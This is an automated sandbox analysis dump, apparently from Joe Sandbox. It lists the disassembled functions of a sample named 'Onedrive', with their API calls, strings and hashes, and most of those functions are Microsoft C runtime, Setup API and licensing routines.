                                        • Opcode Fuzzy Hash: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                        • Instruction Fuzzy Hash: 6FC10832A1EE8296EA70CB54F8443ABA3A0FB85395F601135E68D87B98DF7DD545CF00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: get_int64_arg
                                        • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 1967237116-2589718845
                                        • Opcode ID: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                        • Instruction ID: ad95378bf862459495f5e4ff3d44f35d661711ecd9a3c3018f9861f7f443b1a6
                                        • Opcode Fuzzy Hash: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                        • Instruction Fuzzy Hash: B6713A36A1AF43E2EB508B15E48026A77A1FB897C6F501031EA8E4B7A4DE7DD4458B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: get_int64_arg
                                        • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 1967237116-485287010
                                        • Opcode ID: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                        • Instruction ID: d890d698889b5c73aa98833bdeab8cbd231619b878c42e17cb602c1464af8658
                                        • Opcode Fuzzy Hash: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                        • Instruction Fuzzy Hash: F5711A36A1EF43E6EB608B15E48127A77A0FB897C5F501035EA8E4BBA4DF3DD5458B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: get_int64_arg
                                        • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 1967237116-3627661228
                                        • Opcode ID: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                        • Instruction ID: 028986a065c16d957d7008dc372d7becdbd89a1af6653fd03232c36d484b608f
                                        • Opcode Fuzzy Hash: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                        • Instruction Fuzzy Hash: 9C710B36A1AF43E6EB508B15E45037A77A0FB897C6F201435EA8E4BBA5DF3DD4458B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
                                        • API String ID: 0-4089689869
                                        • Opcode ID: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                        • Instruction ID: 955344bfb205b676fe6c7c422100d4644b1f6f46ea040d62bb9c8ff7faa2c658
                                        • Opcode Fuzzy Hash: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                        • Instruction Fuzzy Hash: 0F716F31A0EE83A9EB60DB10E4803AAB3A1FB853D5F505135E69D47BA9DF3DE445CB01
                                        APIs
                                        • SetupOpenInfFileW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5414
                                        • SetupGetLineCountW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5440
                                          • Part of subcall function 00007FF6104F62F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
                                          • Part of subcall function 00007FF6104F62F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428
                                        • SetupGetLineByIndexW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F548F
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5555
                                          • Part of subcall function 00007FF6104F5020: SetupGetStringFieldW.SETUPAPI ref: 00007FF6104F5060
                                          • Part of subcall function 00007FF6104F5020: GetLastError.KERNEL32 ref: 00007FF6104F5070
                                          • Part of subcall function 00007FF6104F5020: GetProcessHeap.KERNEL32 ref: 00007FF6104F5114
                                          • Part of subcall function 00007FF6104F5020: HeapFree.KERNEL32 ref: 00007FF6104F5129
                                        • SetupCloseInfFile.SETUPAPI ref: 00007FF6104F5595
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Setup$Heap$ErrorFileFreeLastLineProcess$CloseCountFieldIndexOpenString
                                        • String ID: IsoCodes
                                        • API String ID: 2280877036-2510055618
                                        • Opcode ID: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                        • Instruction ID: eebe9e2492e0ab94e79ed41e33ad44020fa54ed95c4d349f641d84be082ba4b5
                                        • Opcode Fuzzy Hash: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                        • Instruction Fuzzy Hash: AA51A232B08E02F6FF009B3998502BD3AAAAB45BB4F956135DE1DD7788DF38D4518780
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: String$DirectFree$AllocContentElement@Release@String@Value@Value@2@@
                                        • String ID: ErrorCID
                                        • API String ID: 4116192075-3250631935
                                        • Opcode ID: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                        • Instruction ID: 5b21f06f94766d67b318c9fcd23b3a84af0df96c14c0cffb4def8df482fd4da2
                                        • Opcode Fuzzy Hash: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                        • Instruction Fuzzy Hash: A251AD21F0CE93E2EE156B29959017C6699EF8CFB4F144430DD8EDB3A5DE2CE8254340
                                        APIs
                                          • Part of subcall function 00007FF6104F62F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
                                          • Part of subcall function 00007FF6104F62F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428
                                        • GetSystemDirectoryW.KERNEL32 ref: 00007FF6104F611C
                                        • GetLastError.KERNEL32 ref: 00007FF6104F612C
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104F6240
                                        • HeapFree.KERNEL32 ref: 00007FF6104F6255
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                        • String ID: \Phone.inf$\SPPUI
                                        • API String ID: 2626721824-3874405122
                                        • Opcode ID: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                        • Instruction ID: ed0f67b855ec02278c6b33acad5af0b3131aa52c101965e74203623f66bbca77
                                        • Opcode Fuzzy Hash: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                        • Instruction Fuzzy Hash: 8F517331B18E42E2EF24AB3994905BE66A9FF88FA0F554035DA4EC3795DF3CE5148740
                                        APIs
                                        Strings
                                        • minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00007FF8A032A7C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_EnvironmentSchedulerScheduler::_Strings
                                        • String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
                                        • API String ID: 3101938-170101930
                                        • Opcode ID: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                        • Instruction ID: dda766de437cb5265f3a73879029173342d32ba702c5369dd95ad2af61ba47dd
                                        • Opcode Fuzzy Hash: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                        • Instruction Fuzzy Hash: 1651193260EE82A6E750EB15E4513ABB7A4FB95380F600035E6CD47BAADF7DD548CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                        • API String ID: 0-1026578051
                                        • Opcode ID: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                        • Instruction ID: 40d9e067bc7e22d72dc12d213915237734ccbcc837f8da750733818cd4842eff
                                        • Opcode Fuzzy Hash: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                        • Instruction Fuzzy Hash: 13517F7191EE43AAE7108F24E44036A73A0FB98399F501235E29E4B7E9CF7DE501CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                        • String ID: S$minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
                                        • API String ID: 4142048518-4206356308
                                        • Opcode ID: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                        • Instruction ID: 5f7c5f18c1a0c0d942abd085f761dc473bcf3bd3ba2989ba265c17419283faab
                                        • Opcode Fuzzy Hash: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                        • Instruction Fuzzy Hash: BC517161A1FE83A5EA508F44E88437967A4FB847D0F602236E5DE07BE5DF7CE5458B00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$ErrorExecuteFreeLastProcessShellmemset
                                        • String ID: https://go.microsoft.com/fwlink/?LinkId=521839
                                        • API String ID: 1345967500-776123123
                                        • Opcode ID: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                        • Instruction ID: 5a0122f0a7658c7b9c251caf0728c3eaf05e999c29fd1066c16131bcd36461d7
                                        • Opcode Fuzzy Hash: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                        • Instruction Fuzzy Hash: B4411E32B08E02EAEF009F79E5903BD27A9EF89B68F554435DA0EC7795DE38E4148350
                                        APIs
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032DAB8
                                        • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A032DAC2
                                          • Part of subcall function 00007FF8A0320B40: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0320B58
                                          • Part of subcall function 00007FF8A0320D10: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0320D65
                                          • Part of subcall function 00007FF8A03253C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03253D3
                                          • Part of subcall function 00007FF8A03253C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03253DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                        • String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                        • API String ID: 4164245112-3166852756
                                        • Opcode ID: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                        • Instruction ID: eb3a5a28e70163d54984636a1d2df0af9cd50147f76b3e3c39038c6068c96b7b
                                        • Opcode Fuzzy Hash: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                        • Instruction Fuzzy Hash: 46412C32A1EE43A5EB10EB10E4913AA6764FB953D0F500135E68E4B7EADF7DE944CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _aligned_msize_invoke_watson_if_error
                                        • String ID: ]$fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                                        • API String ID: 1871870440-1759674166
                                        • Opcode ID: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                        • Instruction ID: 8dafad37136650c83148f6144f8969700ff57985560bb46d1c1521def6a0a8c8
                                        • Opcode Fuzzy Hash: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                        • Instruction Fuzzy Hash: 9341103261DA8696E750CB29E48032ABBE0E799784F104126F7DE87BA9DB7DD450CF00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                        • String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                        • API String ID: 614740146-2931739134
                                        • Opcode ID: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                        • Instruction ID: 040c4fff8b522096b9d9ca2ff285ba4aa08bdbef82899ce5e96164247dd740c4
                                        • Opcode Fuzzy Hash: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                        • Instruction Fuzzy Hash: 8A311B31A1EE83A6EB10EB10E4513AA67A4FB953C0F501135F68E4BBAADF7DD544CB40
                                        APIs
                                        • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA281
                                        • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA2AD
                                        • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA2E2
                                        • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA311
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FreeInformationLocalProduct
                                        • String ID: DependsOn$Family
                                        • API String ID: 942381732-1323192929
                                        • Opcode ID: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                        • Instruction ID: 05b6b4fbb7bb79473d7ae23c9ceeaf58e059cc683fcf3447a955c1cf7394e1f5
                                        • Opcode Fuzzy Hash: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                        • Instruction Fuzzy Hash: 47218772B18F42E6EF008F55A4845BDB7A8FB89FA4B568135DA4E83714DF39E4618700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _abstract_cw$_hw_cw
                                        • String ID: %ls$(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0$minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
                                        • API String ID: 787819578-4254588316
                                        • Opcode ID: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                        • Instruction ID: fede9bb7cb2519b44bb6aed6636a97f3a093cbffab26b3d68d0ad58e631db673
                                        • Opcode Fuzzy Hash: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                        • Instruction Fuzzy Hash: FD31F032A2DA439BD754DB14E49162A77A1FF84780F401439F69A87BE9DF2CE800CF45
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                        • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                                        • API String ID: 614740146-3741990651
                                        • Opcode ID: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                        • Instruction ID: fa3ce56b6590a27beb6bee47d9c0b87f6526453aa72214853e7fe7f9785e3d62
                                        • Opcode Fuzzy Hash: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                        • Instruction Fuzzy Hash: 23216A75A1EE43A6EB509B10E4503AAA260FB943C5F802032E68E4B795DF7DE644CB00
                                        APIs
                                        • StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
                                        • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
                                        • ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96
                                        • ?SetValue@Element@DirectUI@@QEAAJP6APEBUPropertyInfo@2@XZHPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBBD0
                                        • ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBBDF
                                        Strings
